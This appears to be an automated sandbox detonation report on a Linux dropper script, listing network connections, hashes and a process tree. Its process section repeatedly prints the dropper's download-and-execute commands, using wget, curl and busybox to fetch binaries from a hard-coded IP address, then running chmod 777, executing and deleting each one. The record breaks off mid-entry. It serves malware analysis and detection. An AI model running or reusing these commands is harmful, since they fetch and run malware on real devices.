/tmp/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D
[./9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D]
/bin/rm
[rm 9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D]
/usr/bin/wget
[wget http://216.126.231.240/bins/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU]
Network
| Country | Destination | Domain | Proto |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
Files
/tmp/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
memory/746-1-0xb66fa000-0xb670b044-memory.dmp
memory/813-2-0xb6789000-0xb679a044-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-20 03:39
Reported
2024-11-20 03:42
Platform
debian9-mipsbe-20240729-en
Max time kernel
112s
Max time network
114s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc | /tmp/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc | N/A |
| N/A | /tmp/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU | /tmp/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU | N/A |
| N/A | /tmp/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX | /tmp/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX | N/A |
| N/A | /tmp/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7 | /tmp/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7 | N/A |
| N/A | /tmp/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7 | /tmp/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7 | N/A |
| N/A | /tmp/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ | /tmp/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ | N/A |
| N/A | /tmp/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc | /tmp/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc | N/A |
| N/A | /tmp/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv | /tmp/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv | N/A |
| N/A | /tmp/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd | /tmp/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd | N/A |
| N/A | /tmp/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp | /tmp/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp | N/A |
| N/A | /tmp/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN | /tmp/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN | N/A |
| N/A | /tmp/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t | /tmp/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t | N/A |
| N/A | /tmp/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK | /tmp/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK | N/A |
| N/A | /tmp/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D | /tmp/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D | N/A |
| N/A | /tmp/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN | /tmp/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN | N/A |
| N/A | /tmp/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t | /tmp/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t | N/A |
| N/A | /tmp/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK | /tmp/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK | N/A |
| N/A | /tmp/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D | /tmp/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D | N/A |
| N/A | /tmp/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU | /tmp/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU | N/A |
| N/A | /tmp/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX | /tmp/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX | N/A |
| N/A | /tmp/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7 | /tmp/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7 | N/A |
| N/A | /tmp/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7 | /tmp/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7 | N/A |
| N/A | /tmp/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ | /tmp/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ | N/A |
| N/A | /tmp/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc | /tmp/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc | N/A |
| N/A | /tmp/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc | /tmp/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc | N/A |
| N/A | /tmp/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv | /tmp/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv | N/A |
| N/A | /tmp/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd | /tmp/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd | N/A |
| N/A | /tmp/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp | /tmp/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX | /usr/bin/curl | N/A |
| File opened for modification | /tmp/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN | /usr/bin/curl | N/A |
| File opened for modification | /tmp/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t | /usr/bin/curl | N/A |
| File opened for modification | /tmp/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX | /usr/bin/curl | N/A |
| File opened for modification | /tmp/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd | /usr/bin/curl | N/A |
| File opened for modification | /tmp/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D | /usr/bin/curl | N/A |
| File opened for modification | /tmp/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd | /usr/bin/curl | N/A |
| File opened for modification | /tmp/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU | /usr/bin/curl | N/A |
| File opened for modification | /tmp/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp | /usr/bin/curl | N/A |
| File opened for modification | /tmp/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv | /usr/bin/curl | N/A |
| File opened for modification | /tmp/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t | /usr/bin/curl | N/A |
| File opened for modification | /tmp/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv | /usr/bin/curl | N/A |
| File opened for modification | /tmp/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D | /usr/bin/curl | N/A |
| File opened for modification | /tmp/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN | /usr/bin/curl | N/A |
| File opened for modification | /tmp/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU | /usr/bin/curl | N/A |
| File opened for modification | /tmp/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7 | /usr/bin/curl | N/A |
Processes
/tmp/e51e88e5779218a53250cdc2404b6664515c6ca70a827448aabba4fb4a819849.sh
[/tmp/e51e88e5779218a53250cdc2404b6664515c6ca70a827448aabba4fb4a819849.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://216.126.231.240/bins/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc]
/bin/chmod
[chmod 777 THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc]
/tmp/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc
[./THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc]
/bin/rm
[rm THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc]
/usr/bin/wget
[wget http://216.126.231.240/bins/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU]
/bin/chmod
[chmod 777 dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU]
/tmp/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU
[./dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU]
/bin/rm
[rm dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU]
/usr/bin/wget
[wget http://216.126.231.240/bins/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX]
/bin/chmod
[chmod 777 O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX]
/tmp/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX
[./O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX]
/bin/rm
[rm O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX]
/usr/bin/wget
[wget http://216.126.231.240/bins/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7]
/bin/chmod
[chmod 777 rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7]
/tmp/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7
[./rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7]
/bin/rm
[rm rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7]
/usr/bin/wget
[wget http://216.126.231.240/bins/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7]
/bin/chmod
[chmod 777 UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7]
/tmp/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7
[./UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7]
/bin/rm
[rm UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7]
/usr/bin/wget
[wget http://216.126.231.240/bins/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ]
/bin/chmod
[chmod 777 gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ]
/tmp/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ
[./gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ]
/bin/rm
[rm gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ]
/usr/bin/wget
[wget http://216.126.231.240/bins/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc]
/bin/chmod
[chmod 777 BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc]
/tmp/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc
[./BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc]
/bin/rm
[rm BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc]
/usr/bin/wget
[wget http://216.126.231.240/bins/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv]
/bin/chmod
[chmod 777 3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv]
/tmp/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv
[./3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv]
/bin/rm
[rm 3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv]
/usr/bin/wget
[wget http://216.126.231.240/bins/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd]
/bin/chmod
[chmod 777 pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd]
/tmp/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd
[./pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd]
/bin/rm
[rm pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd]
/usr/bin/wget
[wget http://216.126.231.240/bins/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp]
/bin/chmod
[chmod 777 ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp]
/tmp/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp
[./ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp]
/bin/rm
[rm ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp]
/usr/bin/wget
[wget http://216.126.231.240/bins/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN]
/bin/chmod
[chmod 777 QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN]
/tmp/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN
[./QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN]
/bin/rm
[rm QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN]
/usr/bin/wget
[wget http://216.126.231.240/bins/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t]
/bin/chmod
[chmod 777 QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t]
/tmp/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t
[./QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t]
/bin/rm
[rm QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t]
/usr/bin/wget
[wget http://216.126.231.240/bins/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK]
/bin/chmod
[chmod 777 wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK]
/tmp/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK
[./wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK]
/bin/rm
[rm wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK]
/usr/bin/wget
[wget http://216.126.231.240/bins/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D]
/bin/chmod
[chmod 777 9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D]
/tmp/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D
[./9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D]
/bin/rm
[rm 9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D]
/usr/bin/wget
[wget http://216.126.231.240/bins/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN]
/bin/chmod
[chmod 777 QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN]
/tmp/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN
[./QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN]
/bin/rm
[rm QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN]
/usr/bin/wget
[wget http://216.126.231.240/bins/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t]
/bin/chmod
[chmod 777 QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t]
/tmp/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t
[./QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t]
/bin/rm
[rm QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t]
/usr/bin/wget
[wget http://216.126.231.240/bins/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK]
/bin/chmod
[chmod 777 wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK]
/tmp/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK
[./wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK]
/bin/rm
[rm wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK]
/usr/bin/wget
[wget http://216.126.231.240/bins/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D]
/bin/chmod
[chmod 777 9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D]
/tmp/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D
[./9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D]
/bin/rm
[rm 9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D]
/usr/bin/wget
[wget http://216.126.231.240/bins/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU]
/bin/busybox
